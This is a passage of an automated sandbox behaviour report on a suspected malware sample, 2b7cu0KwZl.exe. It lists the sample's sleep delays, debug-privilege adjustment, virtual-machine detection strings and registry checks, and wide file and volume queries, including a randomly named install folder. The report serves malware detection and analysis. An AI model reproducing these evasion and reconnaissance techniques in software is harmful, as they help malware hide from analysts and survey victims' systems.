Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 7428	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File Volume queried: \Device\CdRom0\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\packages\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.bk	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json.bk	Jump to behavior

Source: SingleClientServicesUpdater.exe.0.dr	Binary or memory string: h<vmci
Source: 2b7cu0KwZl.exe, 00000000.00000003.1758632300.0000020C953B6000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1753586303.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1747399775.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1778071163.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1749059168.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1751710976.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1771924677.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1733449598.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1750469675.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1777094025.0000020C9701A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\oneDs_f2e0f4a029670f10d892[1].js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.82520e7b.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.2f73246d.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.45e00f56.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.7a43ec75.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.378fca67.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.ff33ee1b.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.e1dabada.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\aeeEHcwNrcYonySLzRovhrFjzjBinxlDXsZrgPgEoPscLtODPTNtsskzHMPiJBJGJYoXjjYm\AVwkaopeykPSl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\aeeEHcwNrcYonySLzRovhrFjzjBinxlDXsZrgPgEoPscLtODPTNtsskzHMPiJBJGJYoXjjYm\AVwkaopeykPSl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\resources.pak VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation	Jump to behavior
